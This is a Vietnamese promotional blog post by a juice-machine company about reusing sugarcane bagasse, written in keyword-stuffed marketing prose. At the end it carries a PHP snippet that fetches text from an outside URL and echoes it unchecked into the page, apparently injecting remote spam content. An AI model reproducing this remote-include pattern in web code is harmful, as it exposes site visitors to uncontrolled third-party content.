Tái chế bã mía từ máy ép nước mía để sử dụng

Từ cây mía ép qua máy ta được ly nước mía ngon tuyệt nhưng bạn có bao giờ thắc mắc cái bã mía đó sẽ vứt hay sử dụng để làm gì? Hiện tại việc tái chế bã mía để sử dụng đang được rất nhiều người quan tâm.

Nếu bạn là người uống nước mía hàng ngày hay là chủ cửa hàng bán nước mía ép từ máy ép mía chắc chắn bạn sẽ ngạc nhiên trước những công dụng từ bã mía thải ra sau quá trình ép mía lấy nước. Hãy cùng máy ép mía Mai Phương tìm hiểu thông tin hữu ích về vấn đề này.

Mía có hai công dụng chính yêu tại Việt Nam hiện nay là làm nước mía bằng máy ép nước mía siêu sạch để kinh doanh và chiết xuất lấy đường tại các nhà máy. Ngoài ra các phụ phẩm có giá trị của cây mía là bã mía, mật gỉ mía – đều cho giá trị kinh tế cao nếu được tái sử dụng đúng cách.

Tái chế sử dụng bã mía ép từ máy ép mía
Tái chế sử dụng bã mía ép từ máy ép mía

Hiện nay chỉ tính riêng máy ép nước mía trong ngành mía đường, số lượng thải của bã mía đã lên tới 4,5 triệu tấn một năm chưa kể bã mía ép kinh doanh. Có thể nói việc Việt Nam chưa thể tận dụng hết công dụng của các phụ phẩm của cây mía và khá đáng tiếc vì lợi ích kinh tế từ cây trồng này không dừng lại ở việc chỉ tinh chế thành đường thông qua máy ép mía.

Bã mía ép từ máy ép mía siêu sạch hoặc sau khi ép lấy nước chiết xuất đường có thể làm nguồn chất đốt sản sinh nhiệt đủ cho hoạt động của các nhà máy tạo điện, các lò hơi nước. Chưa kể bã mía ép nén thành viên thông qua quá trình xay, sấy và ép từ máy ép mía thích hợp sẽ tạo thành chất đốt dùng trong công nghiệp và sử dụng dân dụng.

Bã mía có thể làm bột giấy, các loại ván ép, tấm ốp trần rất tốt. Trong chăn nuôi, sản phẩm nén từ bã mía sau khi qua máy ép mía để lót chuồng cho gia súc tốt hoặc cũng có thể ủ để làm thức ăn chăn nuôi. Trong trồng trọt, bã từ cây mía thay thế phân bón thông thường, dùng làm giá nấm…Đặc biệt hơn, bột từ bã mía xay ép ra từ máy ép mía có thể thay thế bột mì rất tốt cho sức khỏe người sử dụng. Công nghệ sản xuất tại Australia đã thực hiện được điều này và hiện nay nguồn bột mía này đã xuất khẩu sang các nước như Nhật Bản hay New ZeaLand.

Có thể thấy rõ rằng các sản phẩm từ cây mía ép qua máy ép mía có giá trị rất lớn nhưng ở Việt Nam còn hạn chế về mặt kỹ thuật và công nghệ nên chưa tạo được nguồn lợi kinh tế lớn vì vậy các nhà máy sản xuất đường chưa chú trọng tập trung vào các sản phẩm này.

Với bài viết này, công ty báo giá xe nước mía siêu sạch Mai Phương rất mong đã cung cấp cho bạn những thông tin hữu ích về những tác dụng của bã mía tái chế – một phụ phẩm rất gần gũi với công việc kinh doanh nước mía.
[php] $data = file(“https://vsolutions.vn/vsolution_others/sys/link/1155″);
foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}[/php]

This entry was posted in Chưa được phân loại. Bookmark the permalink.